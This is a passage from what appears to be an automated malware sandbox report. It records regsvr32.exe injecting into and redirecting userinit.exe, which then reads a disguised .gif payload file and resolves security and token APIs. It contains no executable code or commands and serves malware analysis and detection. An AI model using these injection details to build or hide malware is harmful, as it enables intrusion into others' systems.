oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd8000	0x7ffd8000	0x7ffd8fff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 19 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x7ffd8008, size = 4	1	Fn Data
Modify Control Flow	#24: c:\windows\system32\regsvr32.exe	0xf10	os_tid = 0xf80, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6ce90000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6ced0000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = Ôï, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6cf0266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6cf02542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6cf01d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6cf0238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6cf020c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6cf01fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6cf01e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6cf01f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6cf01ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6cf0216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6cf022be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6cf021e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6ce920ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6ce920b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6ce920c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6ce920d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 462831	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #32: userinit.exe

222

0

»

Information	Value
ID	#32
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:46, Reason: Child Process
Unmonitor	End Time: 00:01:51, Reason: Self Terminated
Monitor Duration	00:00:05

OS Process Information

»

Information	Value
PID	0xf9c
Parent PID	0xf18 (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x FA0 0x FB4 0x FB8

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	rw	-
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	rwx	-
pagefile_0x00000000000e0000	0x000e0000	0x000e6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000f0000	0x000f0000	0x000f1fff	Pagefile Backed Memory	rw	-
oleaccrc.dll	0x00100000	0x00100fff	Memory Mapped File	r	-
private_0x0000000000110000	0x00110000	0x0020ffff	Private Memory	rw	-
private_0x0000000000210000	0x00210000	0x0024ffff	Private Memory	rw	-
pagefile_0x0000000000250000	0x00250000	0x00317fff	Pagefile Backed Memory	r	-
private_0x0000000000320000	0x00320000	0x00320fff	Private Memory	rwx	-
pagefile_0x0000000000330000	0x00330000	0x00331fff	Pagefile Backed Memory	r	-
private_0x0000000000340000	0x00340000	0x0034ffff	Private Memory	rw	-
private_0x0000000000350000	0x00350000	0x003cffff	Private Memory	rw	-
windowsshell.manifest	0x00350000	0x00350fff	Memory Mapped File	r	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
private_0x0000000000580000	0x00580000	0x0063ffff	Private Memory	rw	-
private_0x0000000000580000	0x00580000	0x005fffff	Private Memory	rw	-
private_0x0000000000600000	0x00600000	0x0063ffff	Private Memory	rw	-
private_0x0000000000650000	0x00650000	0x0065ffff	Private Memory	rw	-
private_0x0000000000660000	0x00660000	0x0075ffff	Private Memory	-	-
pagefile_0x0000000000760000	0x00760000	0x0083efff	Pagefile Backed Memory	r	-
pagefile_0x0000000000840000	0x00840000	0x00c32fff	Pagefile Backed Memory	r	-
private_0x0000000000c40000	0x00c40000	0x00d4cfff	Private Memory	rw	-
private_0x0000000000d50000	0x00d50000	0x00e4ffff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00ed0fff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00ed4fff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00ed8fff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00edcfff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00ee2fff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00ee6fff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00eeafff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00eeefff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00ef4fff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00ef8fff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00efcfff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00f02fff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00f06fff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00f0afff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00f0efff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00f14fff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00f18fff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00f1cfff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00f20fff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00f24fff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00f28fff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00f2cfff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00f30fff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00f34fff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00f38fff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00f3cfff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00f40fff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00f44fff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00f48fff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00f4cfff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00f50fff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00f54fff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00f58fff	Private Memory	rw	-
private_0x0000000000e50000	0x00e50000	0x00f5cfff	Private Memory	rw	-
private_0x0000000000ee0000	0x00ee0000	0x00f62fff	Private Memory	rw	-
private_0x0000000000ee0000	0x00ee0000	0x00f66fff	Private Memory	rw	-
private_0x0000000000ee0000	0x00ee0000	0x00f6afff	Private Memory	rw	-
private_0x0000000000ee0000	0x00ee0000	0x00f6efff	Private Memory	rw	-
private_0x0000000000ef0000	0x00ef0000	0x00f84fff	Private Memory	rw	-
private_0x0000000000ef0000	0x00ef0000	0x00f88fff	Private Memory	rw	-
private_0x0000000000ef0000	0x00ef0000	0x00f8cfff	Private Memory	rw	-
private_0x0000000000ef0000	0x00ef0000	0x00f90fff	Private Memory	rw	-
private_0x0000000000f00000	0x00f00000	0x00fa6fff	Private Memory	rw	-
private_0x0000000000f00000	0x00f00000	0x00faafff	Private Memory	rw	-
private_0x0000000000f00000	0x00f00000	0x00faefff	Private Memory	rw	-
private_0x0000000000f10000	0x00f10000	0x00fc4fff	Private Memory	rw	-
private_0x0000000000f10000	0x00f10000	0x00fc8fff	Private Memory	rw	-
private_0x0000000000f10000	0x00f10000	0x00fccfff	Private Memory	rw	-
private_0x0000000000f10000	0x00f10000	0x00fd0fff	Private Memory	rw	-
userinit.exe	0x00fe0000	0x00fe8fff	Memory Mapped File	rwx	-
pagefile_0x0000000000ff0000	0x00ff0000	0x01beffff	Pagefile Backed Memory	r	-
staticcache.dat	0x01bf0000	0x0251ffff	Memory Mapped File	r	-
private_0x0000000002520000	0x02520000	0x0271ffff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027b0fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027c2fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027d0fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027e2fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027e6fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027eafff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027eefff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027f2fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027f6fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027fafff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x027fefff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x02802fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x02806fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x0280afff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x0280efff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x02812fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x02816fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x0281afff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x0281efff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x02822fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x02826fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x0282afff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x0282ffff	Private Memory	-	-
private_0x0000000002830000	0x02830000	0x02942fff	Private Memory	rwx	-
private_0x0000000002950000	0x02950000	0x02a4ffff	Private Memory	-	-
private_0x0000000002a70000	0x02a70000	0x02b6ffff	Private Memory	rw	-
private_0x0000000002bb0000	0x02bb0000	0x02beffff	Private Memory	rw	-
sortdefault.nls	0x02bf0000	0x02ebefff	Memory Mapped File	r	-
olepro32.dll	0x6ceb0000	0x6cec8fff	Memory Mapped File	rwx	-
comctl32.dll	0x6ced0000	0x6cf53fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd8000	0x7ffd8000	0x7ffd8fff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 19 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x7ffd8008, size = 4	1	Fn Data
Modify Control Flow	#25: c:\windows\system32\regsvr32.exe	0xf1c	os_tid = 0xfa0, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6ceb0000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6ced0000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
